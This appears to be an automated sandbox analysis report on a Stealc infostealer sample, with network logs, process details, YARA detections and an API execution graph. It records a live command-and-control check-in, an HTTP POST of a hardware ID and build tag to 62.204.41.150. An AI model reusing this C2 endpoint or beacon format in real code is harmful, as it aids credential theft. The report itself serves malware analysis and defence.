                                                                  Oct 7, 2024 19:34:28.636168957 CEST49734443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.636323929 CEST49734443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.636348009 CEST4434973413.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.637321949 CEST49735443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.637345076 CEST4434973513.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.637413979 CEST49735443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.637533903 CEST49735443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.637545109 CEST4434973513.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.637629986 CEST49736443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.637681961 CEST4434973613.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.637733936 CEST49736443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.637840033 CEST49736443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.637859106 CEST4434973613.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.646912098 CEST4434973213.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.647197008 CEST49737443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.647227049 CEST4434973713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.647250891 CEST4434973313.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.647301912 CEST49737443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.647484064 CEST49737443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.647496939 CEST4434973713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.647525072 CEST49738443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.647535086 CEST4434973813.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.647593021 CEST49738443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.647685051 CEST49738443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.647692919 CEST4434973813.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.647888899 CEST4434973413.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.648102999 CEST49739443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648135900 CEST4434973913.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.648241043 CEST49739443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648293972 CEST49739443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648312092 CEST4434973913.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.648648977 CEST4434973513.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.648753881 CEST4434973613.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.648801088 CEST49740443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648824930 CEST4434974013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.648883104 CEST49740443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648967028 CEST49740443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648967981 CEST49741443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.648979902 CEST4434974013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.649010897 CEST4434974113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.649060965 CEST49741443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.649151087 CEST49741443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.649163008 CEST4434974113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.660367966 CEST4434973813.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.660367966 CEST4434973713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.662421942 CEST49742443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.662457943 CEST4434974213.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.662472010 CEST49743443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.662508011 CEST4434974313.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.662528038 CEST49742443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.662561893 CEST49743443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.662720919 CEST49743443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.662735939 CEST4434974313.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.662760019 CEST49742443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.662774086 CEST4434974213.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.663367033 CEST4434973913.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.664896965 CEST49744443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.664932013 CEST4434974413.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.665004969 CEST49744443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.665154934 CEST49744443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.665173054 CEST4434974413.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.665256977 CEST4434974013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.665775061 CEST4434974113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.666703939 CEST49745443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.666721106 CEST4434974513.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.666789055 CEST49745443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.666925907 CEST49745443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.666940928 CEST4434974513.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.667061090 CEST49746443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.667069912 CEST4434974613.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.667126894 CEST49746443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.667298079 CEST49746443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.667306900 CEST4434974613.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.673858881 CEST4434974313.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.674081087 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.674122095 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.674181938 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.674200058 CEST4434974213.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.674520969 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.674525023 CEST49748443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.674535990 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.674561977 CEST4434974813.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.674614906 CEST49748443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.674725056 CEST49748443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.674737930 CEST4434974813.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.676372051 CEST4434974413.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.676562071 CEST49749443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.676587105 CEST4434974913.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.676639080 CEST49749443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.676752090 CEST49749443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.676764965 CEST4434974913.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.678018093 CEST4434974513.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.678174019 CEST49750443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.678188086 CEST4434975013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.678231955 CEST49750443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.678636074 CEST49750443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.678647995 CEST4434975013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.680228949 CEST4434974613.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.680445910 CEST49751443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.680483103 CEST4434975113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.680532932 CEST49751443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.680864096 CEST49751443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.680876970 CEST4434975113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.703609943 CEST4434974813.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.705811977 CEST4434974913.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.706873894 CEST4434975013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.707848072 CEST4434975113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.358508110 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.358665943 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:29.363126040 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:29.363142014 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.363594055 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.373200893 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:29.419398069 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.477958918 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.478032112 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.478176117 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:29.478471994 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:29.478491068 CEST4434974713.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:29.478502989 CEST49747443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:29.478513956 CEST4434974713.107.253.72192.168.2.8
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 7, 2024 19:33:16.854921103 CEST1.1.1.1192.168.2.80x34d5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 19:33:16.854921103 CEST1.1.1.1192.168.2.80x34d5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 19:33:31.579916954 CEST1.1.1.1192.168.2.80x8c69No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 19:33:31.579916954 CEST1.1.1.1192.168.2.80x8c69No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 19:34:16.903925896 CEST1.1.1.1192.168.2.80x418No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 19:34:16.903925896 CEST1.1.1.1192.168.2.80x418No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Oct 7, 2024 19:34:28.009830952 CEST1.1.1.1192.168.2.80x96e4No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 19:34:28.009830952 CEST1.1.1.1192.168.2.80x96e4No error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 7, 2024 19:34:28.009830952 CEST1.1.1.1192.168.2.80x96e4No error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                                                  • 62.204.41.150
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.84970762.204.41.150802332C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 19:33:14.715749979 CEST88OUTGET / HTTP/1.1
                                                                  Host: 62.204.41.150
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Oct 7, 2024 19:33:15.399121046 CEST203INHTTP/1.1 200 OK
                                                                  Date: Mon, 07 Oct 2024 17:33:15 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 0
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Oct 7, 2024 19:33:15.403103113 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF
                                                                  Host: 62.204.41.150
                                                                  Content-Length: 219
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a
                                                                  Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--
                                                                  Oct 7, 2024 19:33:15.878268957 CEST210INHTTP/1.1 200 OK
                                                                  Date: Mon, 07 Oct 2024 17:33:15 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 8
                                                                  Keep-Alive: timeout=5, max=99
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                                                  Data Ascii: YmxvY2s=


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:13:33:13
                                                                  Start date:07/10/2024
                                                                  Path:C:\Users\user\Desktop\Aew8SXjXEb.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Aew8SXjXEb.exe"
                                                                  Imagebase:0x620000
                                                                  File size:505'344 bytes
                                                                  MD5 hash:C89C82AB6576A83A2A32BBFFE44EF4D7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:13:33:13
                                                                  Start date:07/10/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                  Imagebase:0xd70000
                                                                  File size:262'432 bytes
                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:13:33:13
                                                                  Start date:07/10/2024
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
                                                                  Imagebase:0x910000
                                                                  File size:483'680 bytes
                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:1.3%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:6.1%
                                                                    Total number of Nodes:229
                                                                    Total number of Limit Nodes:3
                                                                    execution_graph 32211 63fe10 32214 63a34b 32211->32214 32215 63a354 32214->32215 32219 63a386 32214->32219 32220 634f6c 32215->32220 32221 634f77 32220->32221 32222 634f7d 32220->32222 32271 6361aa 6 API calls std::_Locinfo::_Locinfo_ctor 32221->32271 32226 634f83 32222->32226 32272 6361e9 6 API calls std::_Locinfo::_Locinfo_ctor 32222->32272 32225 634f97 32225->32226 32227 634f9b 32225->32227 32230 634f88 32226->32230 32280 630409 43 API calls std::locale::_Setgloballocale 32226->32280 32273 633462 14 API calls 3 library calls 32227->32273 32248 63a156 32230->32248 32231 634fa7 32233 634fc4 32231->32233 32234 634faf 32231->32234 32276 6361e9 6 API calls std::_Locinfo::_Locinfo_ctor 32233->32276 32274 6361e9 6 API calls std::_Locinfo::_Locinfo_ctor 32234->32274 32237 634fd0 32238 634fe3 32237->32238 32239 634fd4 32237->32239 32278 634cdf 14 API calls __Getctype 32238->32278 32277 6361e9 6 API calls std::_Locinfo::_Locinfo_ctor 32239->32277 32243 634fee 32279 633a49 14 API calls __dosmaperr 32243->32279 32244 634fc1 32244->32226 32245 634fbb 32275 633a49 14 API calls __dosmaperr 32245->32275 32247 634ff5 32247->32230 32281 63a2ab 32248->32281 32253 63a199 32253->32219 32256 63a1b2 32319 633a49 14 API calls __dosmaperr 32256->32319 32257 63a1c0 32308 63a3a6 32257->32308 32261 63a1f8 32320 62dd6d 14 API calls __dosmaperr 32261->32320 32263 63a1fd 32321 633a49 14 API calls __dosmaperr 32263->32321 32264 63a23f 32265 63a288 32264->32265 32323 639dc8 43 API calls 2 library calls 32264->32323 32324 633a49 14 API calls __dosmaperr 32265->32324 32267 63a213 32267->32264 32322 633a49 14 API calls __dosmaperr 32267->32322 32271->32222 32272->32225 32273->32231 32274->32245 32275->32244 32276->32237 32277->32245 32278->32243 32279->32247 32282 63a2b7 ___scrt_is_nonwritable_in_current_image 32281->32282 32283 63a2d1 32282->32283 32325 62ddc1 EnterCriticalSection 32282->32325 32286 63a180 32283->32286 32328 630409 43 API calls std::locale::_Setgloballocale 32283->32328 32285 63a30d 32327 63a32a LeaveCriticalSection std::_Lockit::~_Lockit 32285->32327 32292 639ed6 32286->32292 32289 63a2e1 32289->32285 32326 633a49 14 API calls __dosmaperr 32289->32326 32329 62fe67 32292->32329 32295 639ef7 GetOEMCP 32298 639f20 32295->32298 32296 639f09 32297 639f0e GetACP 32296->32297 32296->32298 32297->32298 32298->32253 32299 633a83 32298->32299 32300 633ac1 32299->32300 32301 633a91 32299->32301 32341 62dd6d 14 API calls __dosmaperr 32300->32341 32302 633aac HeapAlloc 32301->32302 32306 633a95 __Getctype 32301->32306 32304 633abf 32302->32304 32302->32306 32305 633ac6 32304->32305 32305->32256 32305->32257 32306->32300 32306->32302 32340 630478 EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 32306->32340 32309 639ed6 45 API calls 32308->32309 32310 63a3c6 32309->32310 32312 63a403 IsValidCodePage 32310->32312 32316 63a43f std::locale::_Setgloballocale 32310->32316 32314 63a415 32312->32314 32312->32316 32313 63a1ed 32313->32261 32313->32267 32315 63a444 GetCPInfo 32314->32315 32318 63a41e std::locale::_Setgloballocale 32314->32318 32315->32316 32315->32318 32353 626ca2 32316->32353 32342 639faa 32318->32342 32319->32253 32320->32263 32321->32253 32322->32264 32323->32265 32324->32253 32325->32289 32326->32285 32327->32283 32330 62fe85 32329->32330 32336 62fe7e 32329->32336 32330->32336 32337 634eb1 43 API calls 3 library calls 32330->32337 32332 62fea6 32338 633ad1 43 API calls __Getctype 32332->32338 32334 62febc 32339 633b2f 43 API calls _Fputc 32334->32339 32336->32295 32336->32296 32337->32332 32338->32334 32339->32336 32340->32306 32341->32305 32343 639fd2 GetCPInfo 32342->32343 32352 63a09b 32342->32352 32349 639fea 32343->32349 32343->32352 32344 626ca2 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 5 API calls 32347 63a154 32344->32347 32347->32316 32360 638d25 32349->32360 32351 63901c 48 API calls 32351->32352 32352->32344 32354 626caa 32353->32354 32355 626cab IsProcessorFeaturePresent 32353->32355 32354->32313 32357 62764d 32355->32357 32437 627610 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32357->32437 32359 627730 32359->32313 32361 62fe67 std::_Locinfo::_Locinfo_ctor 43 API calls 32360->32361 32362 638d45 32361->32362 32380 6394ae 32362->32380 32364 638e09 32366 626ca2 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 5 API calls 32364->32366 32365 638e01 32383 626c84 14 API calls numpunct 32365->32383 32369 638e2c 32366->32369 32367 638d72 32367->32364 32367->32365 32368 633a83 std::_Locinfo::_Locinfo_ctor 15 API calls 32367->32368 32371 638d97 std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 32367->32371 32368->32371 32375 63901c 32369->32375 32371->32365 32372 6394ae std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 32371->32372 32373 638de2 32372->32373 32373->32365 32374 638ded GetStringTypeW 32373->32374 32374->32365 32376 62fe67 std::_Locinfo::_Locinfo_ctor 43 API calls 32375->32376 32377 63902f 32376->32377 32384 638e2e 32377->32384 32382 6394bf MultiByteToWideChar 32380->32382 32382->32367 32383->32364 32385 638e49 32384->32385 32386 6394ae std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 32385->32386 32390 638e8f 32386->32390 32387 639007 32388 626ca2 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 5 API calls 32387->32388 32389 63901a 32388->32389 32389->32351 32390->32387 32391 633a83 std::_Locinfo::_Locinfo_ctor 15 API calls 32390->32391 32393 638eb5 std::_Locinfo::_Locinfo_ctor 32390->32393 32401 638f3b 32390->32401 32391->32393 32394 6394ae std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 32393->32394 32393->32401 32395 638efa 32394->32395 32395->32401 32412 636368 32395->32412 32398 638f64 32400 638fef 32398->32400 32403 633a83 std::_Locinfo::_Locinfo_ctor 15 API calls 32398->32403 32405 638f76 std::_Locinfo::_Locinfo_ctor 32398->32405 32399 638f2c 32399->32401 32402 636368 std::_Locinfo::_Locinfo_ctor 7 API calls 32399->32402 32423 626c84 14 API calls numpunct 32400->32423 32424 626c84 14 API calls numpunct 32401->32424 32402->32401 32403->32405 32405->32400 32406 636368 std::_Locinfo::_Locinfo_ctor 7 API calls 32405->32406 32407 638fb9 32406->32407 32407->32400 32421 63952a WideCharToMultiByte 32407->32421 32409 638fd3 32409->32400 32410 638fdc 32409->32410 32422 626c84 14 API calls numpunct 32410->32422 32425 635f14 32412->32425 32415 6363a0 32428 6363c5 5 API calls std::_Locinfo::_Locinfo_ctor 32415->32428 32416 636379 LCMapStringEx 32420 6363c0 32416->32420 32419 6363b9 LCMapStringW 32419->32420 32420->32398 32420->32399 32420->32401 32421->32409 32422->32401 32423->32401 32424->32387 32429 636015 32425->32429 32428->32419 32430 636043 32429->32430 32434 635f2a 32429->32434 32430->32434 32436 635f4a LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsSetValue 32430->32436 32432 636057 32433 63605d GetProcAddress 32432->32433 32432->32434 32433->32434 32435 63606d std::_Locinfo::_Locinfo_ctor 32433->32435 32434->32415 32434->32416 32435->32434 32436->32432 32437->32359 32438 626dd6 32439 626de2 ___scrt_is_nonwritable_in_current_image 32438->32439 32464 626fd2 32439->32464 32441 626de9 32442 626f3c 32441->32442 32452 626e13 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 32441->32452 32492 627922 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter std::locale::_Setgloballocale 32442->32492 32444 626f43 32493 63103b 23 API calls std::locale::_Setgloballocale 32444->32493 32446 626f49 32494 630fff 23 API calls std::locale::_Setgloballocale 32446->32494 32448 626f51 32449 626e32 32451 626eb9 32476 622021 32451->32476 32452->32449 32455 626eb3 32452->32455 32488 631015 43 API calls 4 library calls 32452->32488 32472 627a37 32455->32472 32458 626ed5 32458->32444 32459 626ed9 32458->32459 32460 626ee2 32459->32460 32490 630ff0 23 API calls std::locale::_Setgloballocale 32459->32490 32491 627143 79 API calls ___scrt_uninitialize_crt 32460->32491 32463 626eea 32463->32449 32465 626fdb 32464->32465 32495 62729c IsProcessorFeaturePresent 32465->32495 32467 626fe7 32496 62a1be 10 API calls 2 library calls 32467->32496 32469 626fec 32471 626ff0 32469->32471 32497 62a1dd 7 API calls 2 library calls 32469->32497 32471->32441 32498 628240 32472->32498 32474 627a4a GetStartupInfoW 32475 627a5d 32474->32475 32475->32451 32477 62206a 32476->32477 32499 622003 GetPEB 32477->32499 32479 622223 32500 621bee 32479->32500 32484 622783 32489 627a6d GetModuleHandleW 32484->32489 32485 62273f 32486 621bee 74 API calls 32485->32486 32487 622755 AttachConsole 32486->32487 32487->32484 32488->32455 32489->32458 32490->32460 32491->32463 32492->32444 32493->32446 32494->32448 32495->32467 32496->32469 32497->32471 32498->32474 32499->32479 32501 621c1a 32500->32501 32509 621cc0 32501->32509 32529 6249a4 44 API calls 5 library calls 32501->32529 32503 621d52 32525 6244af 32503->32525 32505 621d62 32506 626ca2 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 5 API calls 32505->32506 32507 621d75 32506->32507 32511 621f49 32507->32511 32509->32503 32530 62278c 74 API calls 3 library calls 32509->32530 32531 623b06 74 API calls 32509->32531 32512 621fb9 32511->32512 32514 621f89 32511->32514 32515 626ca2 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 5 API calls 32512->32515 32514->32512 32518 621fd0 32514->32518 32533 6228d3 44 API calls 2 library calls 32514->32533 32534 621d79 74 API calls _Yarn 32514->32534 32535 623198 43 API calls _Deallocate 32514->32535 32517 621fcc VirtualProtect 32515->32517 32517->32484 32517->32485 32536 623b38 74 API calls 4 library calls 32518->32536 32521 621fda 32537 623b06 74 API calls 32521->32537 32523 621fe0 32538 623198 43 API calls _Deallocate 32523->32538 32526 6244c9 codecvt 32525->32526 32527 6244bc 32525->32527 32526->32505 32532 621286 43 API calls _Deallocate 32527->32532 32529->32501 32530->32509 32531->32509 32532->32526 32533->32514 32534->32514 32535->32514 32536->32521 32537->32523 32538->32512

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
